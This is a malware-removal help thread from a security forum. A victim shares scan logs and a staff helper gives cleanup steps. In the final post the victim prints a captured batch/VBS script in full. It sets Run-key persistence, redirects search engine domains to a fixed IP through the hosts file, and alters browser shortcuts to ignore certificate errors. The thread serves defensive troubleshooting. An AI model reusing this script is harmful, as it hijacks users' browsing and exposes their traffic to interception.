Malware/rootkit connecting to external IP, halp me please?

Status
Not open for further replies.

Tom Jones

New Member
Thread author
Jan 22, 2015
7
Hello everyone,

I'd like some help with what I think is some sort of malware/rootkit that has infected my pc.
I think I need to do a series of thorough scans since for a few days in a row I kept getting 5 processes (rundll32.exe) that would pop up a "open file with" window right after I booted. I never clicked open and eventually found out that the rundll32.exe was in C:\Windows\SysWOW64 and I also did all scans with malwarebytes, roguekiller64, microsoft essentials and haven't found much. But I also found a registry key under Computer\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce with a filename Adobe Speed Launcher which I don't quite like and its value is set to 1421941580. Anyway, any help with a series of scans would be appreciated.

-I'm very confident that this is some sort of malware.
The reason being is that this has never happened before, and there are 5 instances of said window when I just boot up. This has never happened before, and the other clue that this is not some legit program is that under the "Program/File" name I see MY first name and that just can't be right.

-I've found also found a "FILE" under C:\Users named "Tom" and I've attached it.
It looks super suspicious I think. I scanned it with VirusTotal but it doesn't seem to find anything wrong with it, nonetheless the results are here:https://www.virustotal.com/en/file/...47ece280c3a89f785c72d997/analysis/1421971881/
I proceeded to open it and it seems to be a text file with some code on it that I think is dead on some sort of malware trying to connect to some ip address that's not even mine: 69.162.120.131


-pasted roguekiller report AND mbam log, FRST, Addition, OTL reports





RogueKiller V10.2.0.0 (x64) [Jan 19 2015] by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/softwares/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : Tom Jones [Administrator]
Mode : Scan -- Date : 01/22/2015 11:25:29

¤¤¤ Processes : 0 ¤¤¤

¤¤¤ Registry : 4 ¤¤¤
[PUM.DesktopIcons] (X64) HKEY_USERS\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu | {59031A47-3F72-44A7-89C5-5595FE6B30EE} : 1 -> Found
[PUM.DesktopIcons] (X86) HKEY_USERS\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu | {59031A47-3F72-44A7-89C5-5595FE6B30EE} : 1 -> Found
[PUM.DesktopIcons] (X64) HKEY_USERS\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031A47-3F72-44A7-89C5-5595FE6B30EE} : 1 -> Found
[PUM.DesktopIcons] (X86) HKEY_USERS\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031A47-3F72-44A7-89C5-5595FE6B30EE} : 1 -> Found

¤¤¤ Tasks : 0 ¤¤¤

¤¤¤ Files : 0 ¤¤¤

¤¤¤ Hosts File : 2 ¤¤¤
[C:\Windows\System32\drivers\etc\hosts] 127.0.0.1 localhost
[C:\Windows\System32\drivers\etc\hosts] ::1 localhost

¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

¤¤¤ Web browsers : 0 ¤¤¤

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: WDC WD1502FAEX-007BA0 ATA Device +++++
--- User ---
[MBR] 97ed83405a22741aa5222a22e681b176
[BSP] e5e13b1e52b32315f7fa08500dcdf184 : Windows Vista/7/8 MBR Code
Partition table:
0 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 1430797 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK

+++++ PhysicalDrive1: INTEL SS DSC2CW120A3 SCSI Disk Device +++++
--- User ---
[MBR] b7e0dc6f6c3f2ac7a7eca2b4ee48a17c
[BSP] 1f82269f5ba8a4c12ac33d16d54131fc : Windows Vista/7/8 MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 100 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 114371 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
Error reading LL2 MBR! ([1] Incorrect function. )


============================================
RKreport_DEL_01212015_224147.log - RKreport_DEL_01212015_224200.log - RKreport_DEL_01212015_225447.log - RKreport_DEL_01212015_225932.log
RKreport_DEL_01222015_001748.log - RKreport_SCN_01212015_223814.log - RKreport_SCN_01212015_224326.log - RKreport_SCN_01212015_225859.log
RKreport_SCN_01212015_233829.log - RKreport_SCN_01222015_001707.log



Thank you!
 

Attachments

  • FRST.txt
    34 KB · Views: 46
  • Addition.txt
    46.4 KB · Views: 60
  • mbamlog.txt
    1 KB · Views: 39
  • Extras.Txt
    71.2 KB · Views: 196
  • OTL.Txt
    52.4 KB · Views: 118

Tom Jones

New Member
Thread author
Jan 22, 2015
7
UPDATE:

Now this is probably bad.

Another shortcut to a .exe file appeared on my desktop under the fake name "VLC Media Player" which I obviously have never installed since I hate that player.
The shortcut's target is "C:\Users\Tom Jones\AppData\Local\Temp\bcdcabfdbbfi.exe" C:\Users\TOMJO~1\AppData\Local\Temp\bcdcabfdbbfi.exe 7-5-1-8-9-0-7-5-3-1-1 KEtIPDQxMjAyHy5MUEFIQEQ2Kx0uTT5PVkdJS0I/OjAfKD9IS0tJPTguNjcrGy47QEQ2Kx0uT0tKQ006VFhEQTwwMCswGCZTPk1TRFFYUFFENGhtb205LihuZGpt

I also scanned this with VirusTotal and these are the results: https://www.virustotal.com/en/file/...ac04edbcef6191f3bd778b65/analysis/1421975128/

Someone gotta help me get rid of this stuff that apparently none of the tools I've used so far has detected anything...
 

argus

Former MalwareTips Staff
Verified
Apr 24, 2014
3,395
Helllo,

My name is Argus and and I will be helping you with your computer problems.

Before we begin, please note the following:
  • I will working be on your Malware issues, this may or may not, solve other issues you have with your machine.
  • The logs can take some time to research, so please be patient with me.
  • Stay with the topic until I tell you that your system is clean. Missing symptoms does not mean that everything is okay.
  • Instructions that I give are for your system only!
  • Please do not run any tools until requested ! The reason for this is so I know what is going on with the machine at any time. Some programs can interfere with others and hamper the recovery process.
  • Please perform all steps in the order received. If you can't understand something don't hesitate to ask.
  • Again I would like to remind you to make no further changes to your computer unless I direct you to do so. I will not help you if you do not follow my instructions.




warning.gif
Rules and policies

We won't support any piracy.
That being told, if any evidence of illegal OS, software, cracks/keygens or any other will be revealed, any further assistance will be suspended. If you are aware that there is this kind of stuff on your machine, remove it before proceeding!
The same applies to any use of P2P software: uTorrent, BitTorrent, Vuze, Kazaa, Ares... We don't provide any help for P2P, except for their removal. All P2P software has to be uninstalled or at least fully disabled before proceeding!

Failure to follow these guidelines will result with closing your topic and withdrawning any assistance.



You need to exit MalwareBytes in your tray area. Right click and select Exit.


Download
51a5f31352b88-icon_MBAR.png
Malwarebytes Anti-Rootkit to your desktop.
  • Double-click the icon to start the tool.
  • It will ask you where to extract it, then it will start.
  • Warning! Malwarebytes Anti-Rootkit needs to be run from an account with administrator rights.
  • Click in the introduction screen "next" to continue.
  • Click in the following screen "Update" to obtain the latest malware definitions.
  • Once the update is complete select "Next" and click "Scan".
  • When the scan is finished and no malware has been found select "Exit".
  • If malware was detected, make sure to check all the items and click "Cleanup". Reboot your computer.
  • Open the MBAR folder and paste the content of the following files in your next reply:
    • "mbar-log-{date} (xx-xx-xx).txt"
    • "system-log.txt"


adwcleaner_new.png
Fix with AdwCleaner

Please download AdwCleaner by Xplode and save the file to your desktop.

  • Right-click on
    adwcleaner_new.png
    icon and select
    RunAsAdmin.jpg
    Run as Administrator to start the tool.
  • Follow the prompts and click Scan.
  • When finished, please click Clean.
  • Upon completion, click Report. A log (AdwCleaner[S*].txt) will open.

Please include the contents of that file in your reply.



FRST.gif
Scan with Farbar Recovery Scan Tool

Please re-run Farbar Recovery Scan Tool to give me a fresh look at your system.
  • Right-click on
    FRST.gif
    icon and select
    RunAsAdmin.jpg
    Run as Administrator to start the tool.
    (XP users click run after receipt of Windows Security Warning - Open File).
  • Make sure that Addition option is checked.
  • Press Scan button and wait.
  • The tool will produce two logfiles on your desktop: FRST.txt and Addition.txt.
Please include their content into your next reply.
 

Tom Jones

New Member
Thread author
Jan 22, 2015
7
Hello again and thank you for your swift reply.
Attached them all:

1. MBAR
2. AdwCleaner
3. FRST, Addition

For some reason utorrent shows up somewhere even though I have uninstalled it prior to the scans.
 

Attachments

  • mbar-log-2015-01-22 (21-07-22).txt
    2.1 KB · Views: 37
  • AdwCleaner[S0].txt
    3.6 KB · Views: 125
  • FRST.txt
    33.4 KB · Views: 56
  • Addition.txt
    44.3 KB · Views: 62

argus

Former MalwareTips Staff
Verified
Apr 24, 2014
3,395
FRST.gif
Fix with Farbar Recovery Scan Tool

icon_exclaim.gif
This fix was created for this user for use on that particular machine.
icon_exclaim.gif

icon_exclaim.gif
Running it on another one may cause damage and render the system unstable.
icon_exclaim.gif
Download attached fixlist.txt file and save it to the Desktop:

Both files, FRST and fixlist.txt have to be in the same location or the fix will not work!

  • Right-click on
    FRST.gif
    icon and select
    RunAsAdmin.jpg
    Run as Administrator to start the tool.
    (XP users click run after receipt of Windows Security Warning - Open File).
  • Press the Fix button just once and wait.
  • If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
  • When finished FRST will generate a log on the Desktop, called Fixlog.txt.

Please attach it to your reply.
 

Attachments

  • fixlist.txt
    3.3 KB · Views: 77

Tom Jones

New Member
Thread author
Jan 22, 2015
7
FRST.gif
Fix with Farbar Recovery Scan Tool

icon_exclaim.gif
This fix was created for this user for use on that particular machine.
icon_exclaim.gif

icon_exclaim.gif
Running it on another one may cause damage and render the system unstable.
icon_exclaim.gif
Download attached fixlist.txt file and save it to the Desktop:

Both files, FRST and fixlist.txt have to be in the same location or the fix will not work!

  • Right-click on
    FRST.gif
    icon and select
    RunAsAdmin.jpg
    Run as Administrator to start the tool.
    (XP users click run after receipt of Windows Security Warning - Open File).
  • Press the Fix button just once and wait.
  • If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
  • When finished FRST will generate a log on the Desktop, called Fixlog.txt.

Please attach it to your reply.


Hello again,

Here's the fixlog:

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 19-01-2015
Ran by Tom Jones at 2015-01-23 13:47:36 Run:1
Running from C:\Users\Tom Jones\Downloads
Loaded Profiles: Tom Jones & (Available profiles: Tom Jones)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
CloseProcesses:
HKU\S-1-5-21-265094073-1043058997-3425087786-1000\...\MountPoints2: F - F:\setup.exe
HKU\S-1-5-21-265094073-1043058997-3425087786-1000\...\MountPoints2: G - G:\bunnyust.exe
HKU\S-1-5-21-265094073-1043058997-3425087786-1000\...\MountPoints2: {4e3c6581-3e0c-11e4-a241-c86000246db4} - F:\Startme.exe
GroupPolicy: Group Policy on Chrome detected <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-265094073-1043058997-3425087786-1000 -> {E911E8E0-F152-4902-A452-372C2073BCEB} URL =
SearchScopes: HKU\S-1-5-21-265094073-1043058997-3425087786-1000 -> {F7AA63F3-AE9E-4E2E-BF1A-7DD143703456} URL = https://search.yahoo.com/yhs/search...ype=W3i_DS,221,0_0,Search,20140727,0,0,0,7743
FF Plugin-x32: @wolfram.com/Mathematica -> C:\Program Files (x86)\Common Files\Wolfram Research\Browser\8.0.4.2609412\npmathplugin.dll No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.31211.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @spoon.net/Spoon Plugin 3.33 -> C:\Program Files (x86)\Spoon\3.33.8.485\npMozillaSpoonPlugin.dll No File
CHR StartupUrls: Default -> "https://search.yahoo.com/yhs/web?hs...=W3i_SP,221,0_0,StartPage,20140727,0,0,0,7743"
CHR Extension: (Auto Refresh Plus) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\oilipfekkmncanaajkapbpancpelijih [2014-01-16]
C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\oilipfekkmncanaajkapbpancpelijih
CHR HKU\S-1-5-21-265094073-1043058997-3425087786-1000\...\Chrome\Extension: [ljfhnpbhhmmhdamdbpmajlonoecdobln] - C:\Users\Tom Jones\AppData\Local\CRE\ljfhnpbhhmmhdamdbpmajlonoecdobln.crx [2012-11-30]
C:\Users\Tom Jones\AppData\Local\CRE\ljfhnpbhhmmhdamdbpmajlonoecdobln.crx
CHR HKLM-x32\...\Chrome\Extension: [eihhgekonheiliaidomffpplfhecmkag] - No Path
CHR HKLM-x32\...\Chrome\Extension: [hdokiejnpimakedhajhdlcegeplioahd] - C:\Users\Tom Jones\AppData\Roaming\LastPass\lpchrome.crx [Not Found]
CHR HKLM-x32\...\Chrome\Extension: [ljfhnpbhhmmhdamdbpmajlonoecdobln] - C:\Users\Tom Jones\AppData\Local\CRE\ljfhnpbhhmmhdamdbpmajlonoecdobln.crx [2012-11-30]
C:\Users\Tom Jones\AppData\Local\CRE\ljfhnpbhhmmhdamdbpmajlonoecdobln.crx
S3 AFSLibrary; system32\DRIVERS\AFSRedirLib.sys [X]
S1 AFSRedirector; system32\DRIVERS\AFSRedir.sys [X]
S3 motmodem; system32\DRIVERS\motmodem.sys [X]
S3 RimUsb; System32\Drivers\RimUsb_AMD64.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
C:\ProgramData\hpe1289.dll
C:\ProgramData\hpe92DE.dll
C:\Users\Tom Jones\AppData\Roaming\uTorrent
emptytemp:



































































*****************

Processes closed successfully.
"HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\F" => Key deleted successfully.
"HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\G" => Key deleted successfully.
"HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{4e3c6581-3e0c-11e4-a241-c86000246db4}" => Key deleted successfully.
HKCR\CLSID\{4e3c6581-3e0c-11e4-a241-c86000246db4} => Key not found.
C:\Windows\system32\GroupPolicy\Machine => Moved successfully.
C:\Windows\system32\GroupPolicy\GPT.ini => Moved successfully.
"HKLM\SOFTWARE\Policies\Google" => Key deleted successfully.
"HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => Key deleted successfully.
"HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Policies\Microsoft\Internet Explorer" => Key deleted successfully.
HKU\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value deleted successfully.
HKU\S-1-5-19\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value deleted successfully.
HKU\S-1-5-20\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value deleted successfully.
"HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{E911E8E0-F152-4902-A452-372C2073BCEB}" => Key deleted successfully.
HKCR\CLSID\{E911E8E0-F152-4902-A452-372C2073BCEB} => Key not found.
"HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{F7AA63F3-AE9E-4E2E-BF1A-7DD143703456}" => Key deleted successfully.
HKCR\CLSID\{F7AA63F3-AE9E-4E2E-BF1A-7DD143703456} => Key not found.
"HKLM\Software\Wow6432Node\MozillaPlugins\@wolfram.com/Mathematica" => Key deleted successfully.
"HKLM\Software\Wow6432Node\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0" => Key deleted successfully.
C:\Program Files (x86)\Microsoft Silverlight\5.1.31211.0\npctrl.dll => Moved successfully.
"HKLM\Software\Wow6432Node\MozillaPlugins\@spoon.net/Spoon Plugin 3.33" => Key deleted successfully.
Chrome StartupUrls deleted successfully.
C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\oilipfekkmncanaajkapbpancpelijih directory not found.
"C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\oilipfekkmncanaajkapbpancpelijih" => File/Directory not found.
"HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Google\Chrome\Extensions\ljfhnpbhhmmhdamdbpmajlonoecdobln" => Key deleted successfully.
"C:\Users\Tom Jones\AppData\Local\CRE\ljfhnpbhhmmhdamdbpmajlonoecdobln.crx" => File/Directory not found.
"C:\Users\Tom Jones\AppData\Local\CRE\ljfhnpbhhmmhdamdbpmajlonoecdobln.crx" => File/Directory not found.
"HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\eihhgekonheiliaidomffpplfhecmkag" => Key deleted successfully.
"HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\hdokiejnpimakedhajhdlcegeplioahd" => Key deleted successfully.
"HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\ljfhnpbhhmmhdamdbpmajlonoecdobln" => Key deleted successfully.
"C:\Users\Tom Jones\AppData\Local\CRE\ljfhnpbhhmmhdamdbpmajlonoecdobln.crx" => File/Directory not found.
"C:\Users\Tom Jones\AppData\Local\CRE\ljfhnpbhhmmhdamdbpmajlonoecdobln.crx" => File/Directory not found.
AFSLibrary => Service deleted successfully.
AFSRedirector => Service deleted successfully.
motmodem => Service deleted successfully.
RimUsb => Service deleted successfully.
VGPU => Service deleted successfully.
C:\ProgramData\hpe1289.dll => Moved successfully.
C:\ProgramData\hpe92DE.dll => Moved successfully.
"C:\Users\Tom Jones\AppData\Roaming\uTorrent" => File/Directory not found.
EmptyTemp: => Removed 114.9 MB temporary data.


The system needed a reboot.

==== End of Fixlog 13:47:37 ====
 

Tom Jones

New Member
Thread author
Jan 22, 2015
7
Hello again,

Um I'm not sure whether you read my first post, so specifically I am concerned regarding this portion:

-I've found also found a "FILE" under C:\Users named "Tom" and I've attached it.
It looks super suspicious I think. I scanned it with VirusTotal but it doesn't seem to find anything wrong with it, nonetheless the results are here:https://www.virustotal.com/en/file/...47ece280c3a89f785c72d997/analysis/1421971881/
I proceeded to open it and it seems to be a text file with some code on it that I think is dead on some sort of malware trying to connect to some ip address that's not even mine: 69.162.120.131


Can you take a look at this .txt file? It's still there but before deleting it I want to get a better understanding of what it's doing.
I attached it here.
 

Attachments

  • Tom.txt
    7 KB · Views: 70

argus

Former MalwareTips Staff
Verified
Apr 24, 2014
3,395
51a46ae42d560-malwarebytes_anti_malware.png
Scan with Malwarebytes' Anti-Malware
Please download Malwarebytes Anti-Malware and save it to your desktop.
  • Install the progam and select update.
  • Once updated, click the Settings tab, in the left panel choose Detection & Protection and tick Scan for rootkits.
  • Click the Scan tab, choose Threat Scan is checked and click Scan Now.
  • If threats are detected, click the Apply Actions button. You will now be prompted to reboot. Click Yes.
  • Upon completion of the scan (or after the reboot), click the History tab.
  • Click Application Logs and double-click the Scan Log.
  • At the bottom click Export and choose Text file.
Save the file to your desktop and include its content in your next reply.
 

Tom Jones

New Member
Thread author
Jan 22, 2015
7
Does anyone around here have any clue what this script is doing?
-This was a file without an extension, found in C:\Users\
Please let me know even if you know a bit of it.

Code:
@echo off Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat3" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Sys32.vbs" Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat4" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Sys33.vbs" Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat1" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Macrosoft.vbs" Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat2" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Systm.vbs" Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Windaws.bat" Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /V "Start Page" /D "http://www.google.com" /F Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v HomePage /t REG_DWORD /d 1 /f Jones\AppData\Roaming\Windaws.bat
cd /D "%APPDATA%\Mozilla\Firefox\Profiles" Jones\AppData\Roaming\Windaws.bat
cd *.default Jones\AppData\Roaming\Windaws.bat
set buzaar=%cd% Jones\AppData\Roaming\Windaws.bat
echo user_pref("browser.newtab.url", "http://www.google.com");>>"%buzaar%\prefs.js" Jones\AppData\Roaming\Windaws.bat
echo user_pref("browser.startup.homepage", "http://www.google.com");>>"%buzaar%\prefs.js" Jones\AppData\Roaming\Windaws.bat
set buzaar= Jones\AppData\Roaming\Windaws.bat
cd %windir% Jones\AppData\Roaming\Windaws.bat
set bugalatasligala=%windir%\System32\drivers\etc\hosts Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.google.com" %bugalatasligala% || echo 69.162.120.131 www.google.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.bing.com" %bugalatasligala% || echo 69.162.120.131 www.bing.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 search.yahoo.com" %bugalatasligala% || echo 69.162.120.131 search.yahoo.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.google.co.uk" %bugalatasligala% || echo 69.162.120.131 www.google.co.uk>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.google.ca" %bugalatasligala% || echo 69.162.120.131 www.google.ca>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.google.com.tr" %bugalatasligala% || echo 69.162.120.131 www.google.com.tr>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 isearch.babylon.com" %bugalatasligala% || echo 69.162.120.131 isearch.babylon.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 search.conduit.com" %bugalatasligala% || echo 69.162.120.131 search.conduit.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.yahoo.com" %bugalatasligala% || echo 69.162.120.131 www.yahoo.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 us.yhs4.search.yahoo.com" %bugalatasligala% || echo 69.162.120.131 us.yhs4.search.yahoo.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 r.search.yahoo.com" %bugalatasligala% || echo 69.162.120.131 r.search.yahoo.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.aol.com" %bugalatasligala% || echo 69.162.120.131 www.aol.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 search.aol.com" %bugalatasligala% || echo 69.162.120.131 search.aol.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 search.comcast.net" %bugalatasligala% || echo 69.162.120.131 search.comcast.net>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.google.co.in" %bugalatasligala% || echo 69.162.120.131 www.google.co.in>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.ask.com" %bugalatasligala% || echo 69.162.120.131 www.ask.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 xfinity.comcast.net" %bugalatasligala% || echo 69.162.120.131 xfinity.comcast.net>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 search.avg.com" %bugalatasligala% || echo 69.162.120.131 search.avg.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
exit Jones\AppData\Roaming\Windaws.bat
SET wsc = WScript.CreateObject("WScript.Shell") Jones\AppData\Roaming\Systm.vbs
SET fso = WScript.CreateObject("Scripting.FileSystemObject") Jones\AppData\Roaming\Systm.vbs
If (fso.FileExists(wsc.SpecialFolders("AppData") & "\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.LNK")) Then Jones\AppData\Roaming\Systm.vbs
SET bozcaada = wsc.CreateShortcut(wsc.SpecialFolders("AppData") & "\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.LNK") Jones\AppData\Roaming\Systm.vbs
If (fso.FileExists("C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) Then Jones\AppData\Roaming\Systm.vbs
bozcaada.targetpath = "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" Jones\AppData\Roaming\Systm.vbs
else Jones\AppData\Roaming\Systm.vbs
bozcaada.targetpath = "C:\Program Files\Google\Chrome\Application\chrome.exe" Jones\AppData\Roaming\Systm.vbs
End If Jones\AppData\Roaming\Systm.vbs
bozcaada.Arguments = "http://www.google.com -ignore-certificate-errors --disable-show-modal-dialog --disable-infobars" Jones\AppData\Roaming\Systm.vbs
bozcaada.save() Jones\AppData\Roaming\Systm.vbs
End If 'uz Jones\AppData\Roaming\Systm.vbs
If (fso.FileExists(wsc.SpecialFolders("AppData") & "\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.LNK")) Then Jones\AppData\Roaming\Sys33.vbs
SET bozcaada = wsc.CreateShortcut(wsc.SpecialFolders("AppData") & "\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.LNK") Jones\AppData\Roaming\Sys33.vbs
If (fso.FileExists("C:\Program Files (x86)\Mozilla Firefox\firefox.exe")) Then Jones\AppData\Roaming\Sys33.vbs
bozcaada.targetpath = "C:\Program Files (x86)\Mozilla Firefox\firefox.exe" Jones\AppData\Roaming\Sys33.vbs
bozcaada.targetpath = "C:\Program Files\Mozilla Firefox\firefox.exe" Jones\AppData\Roaming\Sys33.vbs
bozcaada.Arguments = "http://www.google.com" Jones\AppData\Roaming\Sys33.vbs
End If 'ez Jones\AppData\Roaming\Sys33.vbs
If (fso.FileExists(wsc.SpecialFolders("desktop") & "\Mozilla Firefox.LNK")) Then Jones\AppData\Roaming\Sys32.vbs
SET bozcaada = wsc.CreateShortcut(wsc.SpecialFolders("desktop") & "\Mozilla Firefox.LNK") Jones\AppData\Roaming\Sys32.vbs
End If 'oz Jones\AppData\Roaming\Sys32.vbs
If (fso.FileExists(wsc.SpecialFolders("desktop") & "\Google Chrome.LNK")) Then Jones\AppData\Roaming\Macrosoft.vbs
SET bozcaada = wsc.CreateShortcut(wsc.SpecialFolders("desktop") & "\Google Chrome.LNK") Jones\AppData\Roaming\Macrosoft.vbs
End If 'az Jones\AppData\Roaming\Macrosoft.vbs
 
Status
Not open for further replies.

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top